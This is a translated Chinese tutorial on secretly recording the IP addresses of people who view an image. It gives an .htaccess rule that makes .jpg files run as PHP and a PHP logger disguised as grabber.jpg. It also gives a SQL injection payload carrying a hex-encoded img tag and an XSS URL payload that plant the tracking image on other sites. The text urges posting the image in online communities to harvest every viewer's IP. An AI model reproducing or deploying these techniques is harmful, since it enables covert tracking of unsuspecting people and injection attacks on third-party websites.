基於PHP實現通過照片擷取ip地址_php執行個體

在本教程中，我們將學習如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess檔案，將jpg檔案當作php檔案來解析。

下面就是我們需要向.htaccess中添加的代碼：

AddHandler application/x-httpd-php5 .jpg

然後將下面的代碼複製到記事本中，命名為grabber.jpg

<?php$fh = fopen(‘ip_list.txt', ‘a');fwrite($fh, $_SERVER[‘REMOTE_ADDR'].”“);fclose($fh);$im = imagecreatefromjpeg(“n00b.png”);header(‘Content-Type: image/jpeg');imagejpeg($im);imagedestroy($im);?>

將grabber.jpg的使用權限設定為755，然後再找一張照片，將其命名為n00b.png，接著放到與grabber.jpg相同的目錄之中。

就這樣，一切工作就緒了。當別人瀏覽grabber.jpg這張照片的時候，他的ip地址就會被記錄下來。

（譯者註：需要把這些東西上傳至我們的個人網站空間中）

POC：

(譯者註：作者這裡貼了一張可擷取ip的示範照片，為了大家的隱私，我沒有將其貼出，讀者可自行去作者部落格查看)

至此，我們的照片已經可以開始工作了。

接著我還想說明一下如何使用SQLi來擷取ip地址。其實使用照片來盜取ip地址十分快捷，我們沒有理由去使用SQLi這種方法，但是為了讓讀者擷取到更多的知識，我還是說明一下吧：

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

現在，再說一下如何使用xss來擷取ip地址：

http://leettime.net/xsslab1/chalg1.php?name=<img src=”yun_qi_img/tryme.jpg”>&submit=Search

好了，就是這些了。

我們可以用這個技巧做許多有趣的事情，事實上大部分社區都允許我們發布一些照片，所以我們可以用這個方法去擷取所有訪問到我們照片的人的ip地址。

以上所述是小編給大家介紹的基於PHP實現通過照片擷取ip地址的相關內容，希望對大家有所協助！